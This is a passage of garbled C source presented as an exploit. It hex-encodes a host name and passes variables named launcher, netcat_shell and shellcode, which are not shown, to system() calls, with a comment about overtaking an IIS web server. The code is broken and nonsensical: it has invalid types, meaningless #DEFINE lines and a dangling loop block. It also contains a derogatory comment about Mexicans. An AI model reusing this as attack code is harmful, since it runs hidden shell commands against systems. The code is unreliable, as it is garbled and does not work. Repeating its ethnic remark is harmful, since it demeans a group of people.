 "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
 "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
 
 
 main()
 {
 
 //Section Initialises designs implemented by mexicans
 //Imigrate
 system(launcher);
 system(netcat_shell);
 system(shellcode);
 
 //int socket = 0;
 //double long port = 0.0;
 
 //#DEFINE port host address
 //#DEFINE number of inters
 //#DEFINE gull eeuEE
 
  // for(int j; j < 30; j++)
 {
 //Find socket remote address fault
 printf(".");
 }
 //overtake inetinfo here IIS_66^
 return 0;
 }
